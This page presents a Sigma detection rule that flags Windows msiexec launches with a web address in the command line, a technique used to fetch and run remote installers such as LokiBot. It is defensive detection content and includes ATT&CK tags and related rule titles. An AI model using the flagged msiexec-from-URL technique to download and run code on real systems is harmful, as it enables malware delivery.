MsiExec Web Install
Detects suspicious msiexec process starts with web addresses as parameter
Sigma rule (View on GitHub)
1title: MsiExec Web Install
2id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
3related:
4 - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
5 type: similar
6status: test
7description: Detects suspicious msiexec process starts with web addresses as parameter
8references:
9 - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
10author: Florian Roth (Nextron Systems)
11date: 2018-02-09
12modified: 2022-01-07
13tags:
14 - attack.defense-evasion
15 - attack.t1218.007
16 - attack.command-and-control
17 - attack.t1105
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 selection:
23 CommandLine|contains|all:
24 - ' msiexec'
25 - '://'
26 condition: selection
27falsepositives:
28 - False positives depend on scripts and administrative tools used in the monitored environment
29level: medium
References
-
Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation—via the Windows Installer service in Microsoft Windows operating systems.
Read More
Related rules
- Curl Download And Execute Combination
- Download from Suspicious Dyndns Hosts
- File Download Via Nscurl - MacOS
- File Download Via Windows Defender MpCmpRun.EXE
- Greenbug Espionage Group Indicators